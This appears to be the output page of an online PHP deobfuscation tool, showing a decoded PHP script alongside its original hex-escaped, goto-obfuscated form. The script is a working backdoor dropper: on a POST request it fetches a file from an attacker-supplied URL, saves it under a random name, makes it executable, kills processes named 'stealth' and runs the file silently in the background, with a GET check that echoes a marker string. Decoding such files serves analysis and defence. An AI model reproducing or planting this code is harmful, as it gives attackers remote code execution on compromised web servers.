Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php gotoXljGS; nMNd4:$Y_JLM=file_get_contents(trim($rOWLw)); gotojRAr_; qUhpk:echo ..
Decoded Output download
<?php
gotoXljGS;
nMNd4:$Y_JLM=file_get_contents(trim($rOWLw));
gotojRAr_;
qUhpk:echo "aux6TheioGhueQu3";
gotoBW_YN;
KK_YU:$aXH4D=substr(str_shuffle(str_repeat($TI4AI="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",ceil(6/strlen($TI4AI)))),1,6);
gotoo6j1c;
iCbpx:exec($pgcps);
gotoDJ29v;
qgWl4:if(!($_POST["cp"]=="download")) {
gotohr6VR;
}
gotoKK_YU;
k5Ofv:if(empty($rOWLw)) {
gotoqtfL9;
}
gotolTDl2;
k221g:VmHUR:gotoqgWl4;
qhcVR:chmod($aXH4D,0755);
gotot76FM;
XdH2U:qtfL9:gotoUA1tk;
XljGS:error_reporting(0);
gotoe2htE;
o6j1c:$rOWLw=$_POST["url"];
gotok5Ofv;
jRAr_:file_put_contents($aXH4D,$Y_JLM);
gotoqhcVR;
BW_YN:die;
gotok221g;
t76FM:$pgcps="./{$aXH4D} > /dev/null 2>/dev/null &";
gotoiCbpx;
GwGpj:exec("pkill -f -9 stealth");
gotonMNd4;
e2htE:if(!($_GET["cg"]=="chk")) {
gotoVmHUR;
}
gotoqUhpk;
RC55t:exec("pkill -9 -f stealth");
gotoGwGpj;
lTDl2:@unlink($aXH4D);
gotoRC55t;
DJ29v:echo "ok";
gotoXdH2U;
UA1tk:hr6VR: ?>Did this file decode correctly?
Original Code
<?php
gotoXljGS;
nMNd4:$Y_JLM=file_get_contents(trim($rOWLw));
gotojRAr_;
qUhpk:echo "\141\x75\x78\x36\x54\150\x65\151\x6f\107\x68\x75\145\x51\165\63";
gotoBW_YN;
KK_YU:$aXH4D=substr(str_shuffle(str_repeat($TI4AI="\x30\x31\x32\x33\64\x35\66\x37\x38\x39\x61\x62\x63\x64\x65\x66\147\150\x69\x6a\153\x6c\155\x6e\x6f\160\161\x72\163\164\x75\x76\x77\170\171\172\x41\x42\103\104\x45\106\x47\x48\111\112\x4b\114\x4d\x4e\x4f\120\121\x52\x53\x54\x55\126\x57\x58\131\x5a",ceil(6/strlen($TI4AI)))),1,6);
gotoo6j1c;
iCbpx:exec($pgcps);
gotoDJ29v;
qgWl4:if(!($_POST["\x63\160"]=="\x64\157\167\156\x6c\x6f\141\x64")) {
gotohr6VR;
}
gotoKK_YU;
k5Ofv:if(empty($rOWLw)) {
gotoqtfL9;
}
gotolTDl2;
k221g:VmHUR:gotoqgWl4;
qhcVR:chmod($aXH4D,0755);
gotot76FM;
XdH2U:qtfL9:gotoUA1tk;
XljGS:error_reporting(0);
gotoe2htE;
o6j1c:$rOWLw=$_POST["\165\162\154"];
gotok5Ofv;
jRAr_:file_put_contents($aXH4D,$Y_JLM);
gotoqhcVR;
BW_YN:die;
gotok221g;
t76FM:$pgcps="\56\57{$aXH4D}\40\76\x20\x2f\144\145\x76\57\156\165\154\154\x20\x32\76\x2f\x64\145\166\57\x6e\x75\x6c\x6c\x20\46";
gotoiCbpx;
GwGpj:exec("\160\153\x69\154\154\40\55\146\x20\x2d\x39\40\163\x74\145\x61\x6c\164\150");
gotonMNd4;
e2htE:if(!($_GET["\x63\x67"]=="\143\x68\153")) {
gotoVmHUR;
}
gotoqUhpk;
RC55t:exec("\x70\153\151\154\154\x20\x2d\x39\40\x2d\146\x20\x73\x74\145\x61\154\164\150");
gotoGwGpj;
lTDl2:@unlink($aXH4D);
gotoRC55t;
DJ29v:echo "\x6f\153";
gotoXdH2U;
UA1tk:hr6VR:Function Calls
| None |
Stats
| MD5 | 56e3045b5f2a52ac109229f1f1235a4f |
| Eval Count | 0 |
| Decode Time | 85 ms |